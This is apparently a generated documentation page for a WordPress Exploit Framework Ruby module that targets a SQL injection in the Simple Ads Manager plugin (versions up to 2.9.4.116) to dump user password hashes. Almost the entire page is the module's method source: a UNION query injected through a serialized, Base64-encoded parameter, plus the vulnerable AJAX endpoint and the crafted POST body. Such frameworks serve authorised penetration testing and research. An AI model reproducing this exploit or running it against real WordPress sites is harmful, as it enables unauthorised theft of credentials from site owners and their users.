class Wpxf::Auxiliary::SimpleAdsManagerHashDump
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 8 def initialize super update_info( name: 'Simple Ads Manager <= 2.9.4.116', author: [ 'Kacper Szurek', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'], ['WPVDB', '8357'] ], date: 'Dec 30 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 25 def check check_plugin_version_from_readme('simple-ads-manager', '2.9.5.118', '2.9.4.116') end
encode_query(query)
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 41 def encode_query(query) query = ") UNION (#{query}" serialized = "a:4:{s:2:\"WC\";s:3:\"1=0\";s:3:\"WCT\";s:0:\"\";s:3:\"WCW\";s:#{query.bytesize}:\"#{query}\";s:4:\"WC2W\";s:0:\"\";}" Base64.strict_encode64(serialized) end
hashdump_number_of_cols()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 33 def hashdump_number_of_cols 23 end
hashdump_prefix_fingerprint_statement()
click to toggle source
Calls superclass method
Wpxf::WordPress::HashDump#hashdump_prefix_fingerprint_statement
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 51 def hashdump_prefix_fingerprint_statement encode_query(super) end
hashdump_request_body()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 55 def hashdump_request_body { 'action' => 'load_place', 'id' => '0', 'pid' => '1', 'wc' => hashdump_sql_statement } end
hashdump_request_method()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 64 def hashdump_request_method :post end
hashdump_sql_statement()
click to toggle source
Calls superclass method
Wpxf::WordPress::HashDump#hashdump_sql_statement
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 47 def hashdump_sql_statement encode_query(super) end
reveals_one_row_per_request()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 29 def reveals_one_row_per_request true end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb, line 37 def vulnerable_url normalize_uri(wordpress_url_plugins, 'simple-ads-manager', 'sam-ajax-loader.php') end